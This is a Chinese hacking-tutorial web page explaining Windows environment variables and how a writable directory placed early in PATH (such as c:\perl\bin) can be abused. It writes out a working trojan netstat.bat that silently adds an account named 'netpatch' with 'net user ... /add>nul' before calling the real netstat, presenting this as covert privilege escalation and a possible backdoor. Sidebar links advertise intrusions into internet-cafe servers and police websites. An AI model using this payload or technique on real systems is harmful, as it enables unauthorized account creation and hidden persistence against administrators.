当前位置: 代码网 > 服务器>网络安全>脚本攻防 > 环境变量在Hacking中的应用

环境变量在Hacking中的应用

2008年10月08日 脚本攻防 我要评论
环境变量在Hacking中的应用 首先,我们先了解下什么叫环境变量!环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数,比如临时文件夹位置和系统文件夹位置等等。这点有点类似于DOS时期的默认... 08-10-08
首先,我们先了解下什么叫环境变量!
环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数,比如临时文件夹位置和系统文件夹位置等等。这点有点类似于dos时期的默认路径,当你运行某些程时序除了在当前文件夹中寻找外,还会到设置的默认路径中去查找。比如
查看系统当前的环境变量,可以使用set命令查看!
下面是执行set命令后反馈的信息 allusersprofile=c:\documents and settings\all users
appdata=c:\documents and settings\administrator\application data
clientname=console
commonprogramfiles=c:\program files\common files
computername=145f63ca0a6f46d
comspec=c:\windows\system32\cmd.exe
fp_no_host_check=no
homedrive=c:
homepath=\documents and settings\administrator
logonserver=\\145f63ca0a6f46d
number_of_processors=2
os=windows_nt
path=d:\progra~1\borland\delphi7\bin;d:\progra~1\borland\delphi7\projects\bpl\;c:\windows\system32;c:\windows;c:\windows\system32\wbem
pathext=.com;.exe;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.wsh
processor_architecture=x86
processor_identifier=x86 family 6 model 15 stepping 6, genuineintel
processor_level=6
processor_revision=0f06
programfiles=c:\program files
prompt=$p$g
sessionname=console
systemdrive=c:
systemroot=c:\windows
temp=c:\docume~1\admini~1\locals~1\temp
tmp=c:\docume~1\admini~1\locals~1\temp
userdomain=145f63ca0a6f46d
username=administrator
userprofile=c:\documents and settings\administrator
windir=c:\windows
======================================================================
我们知道,当我们把nc一类的常用小工具放在system32时,不管我们当前路径在哪,都可以执行nc命令!------hacking中也提供了不少方便,不是么?
其实这就是 path 变量所起的作用了!
如果将path变量中的内容全部删除,那么原来的系统命令系统都将无法识别了。
也就是说,当我们在cmd中输入些命令时,系统将以如下顺序查找相关程序,来达到直接调用程序或文件的目的!
1.
当前目录下的可执行文件!
2.
依次查找path变量中的所指定的目录! ok,在大体认识了环境变量后,我们开始切入主题,谈谈如何利用环境变量为我们的hacking提供便利。
我们知道perl安装后会在变量path内容的最前面加入c:\perl\bin //目录依安装而定
而当管理员权限配置不当时,会疏忽此目录的权限配置(默认权限配置,各win操作系统均有写权限),也就给我们创造了提权的条件。 下面我举个利用的例子!
//是否可利用,取决于path变量的位置以及该目录是否可写
//环境变量一定要在系统自带环境变量之前。 假设条件如下:
目标安装了perl,且目录为c:\perl\bin
//目录可写
系统环境变量中的path变量内容如下
path=c:\perl\bin\;c:\windows\system32;c:\windows;c:\windows\system32\wbem
我们可以在该目录下创建如下文件
netstat.cmd
or
netstat.bat //常用系统命令亦可,请自己举一反三!thx~
文件内容如下 @net user netpatch nspcn.org /add>nul
rem 命令一定要记得加 @ 结尾加
>nul
rem @是为了隐藏命令本身
rem >nul 是为了隐藏命令执行完后的结果反馈!
@%systemroot%\system32\netstat.exe %1 %2 %3 %4 %5 %6
rem 学过批处理命令的同学应该知道这后面的%1 %2 %3等,是起 参数的作用 当管理员执行命令时,由于path变量中c:\perl\bin位于系统环境变量的前面,所以,当管理员执行netstat命令时,系统会首先找当前目录下的可执行文件,默认也就是”c:\documents and settings\administrator\” (依登陆用户而定)当没找到netstat程序时,就会接着依次寻找环境变量中的path变量中所定义的目录,第一个当然是c:\perl\bin目录啦..由于系统找的是可执行程序,so…自然而然的找到了我们的netstat.bat,然后系统也就理所当然的执行了我们设置好的命令。由于我们构造的巧妙,未露丝毫马脚..成功暗地提权…..
此乃三十六计中的暗渡陈仓也…. 提权的小技巧讲完了…聪明的你或许会想到..如果作为backdoor呢?呵呵~~
为啥不可呢,有idea就得试…没测试哪来的正果呢?
(0)

相关文章:

  • 教你入侵网吧服务器

    教你入侵网吧服务器

    教你入侵网吧服务器 如今,很多网吧都安装了万象网吧管理系统,这种系统所带来的方便是有目共睹的。但是,越是便捷的系统所存在的安全隐患就越大,很多黑客就想出了破解... [阅读全文]
  • 入侵RedHat Linux系统的方法

    入侵RedHat Linux系统的方法

    入侵RedHat Linux系统的方法 假设是:www.fbi.gov.tw。^__^ 先让俺看看是不是连得上: C:ping www.fbi.gov.tw ... [阅读全文]
  • 友情检测网站

    友情检测网站

    友情检测某市公安局网站 大家好,我是上帝之爱,这几天闲着无聊,就想搞一下公安局的网站,就在网上找公安局的网站,嘿嘿,吃饱了没事干!目标站:用到的工具:1.左手... [阅读全文]
  • 系统泄露密码的入侵分析

    系统泄露密码的入侵分析

    系统泄露密码的入侵分析 Windows访问139端口时自动用当前用户、密码连接,造成泄露用户密码,虽然其密码是加密的,但一样可以用来攻击。  下面是SMB的密... [阅读全文]
  • 安全检测ASP.net开发网站实例

    安全检测ASP.net开发网站实例

    安全检测ASP.net开发网站实例 今天上了一个人才招聘网站,对他们的招聘系统我很感兴趣,aspx结尾的,看来是.net的程序,这样的网站会不会有什么漏洞呢?... [阅读全文]
  • 学习利用文件包含漏洞进行网站入侵

    学习利用文件包含漏洞进行网站入侵

    学习利用文件包含漏洞进行网站入侵 一、看见漏洞公告   最近想学习一下文件包含漏洞,在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的,PhpwCMS ... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com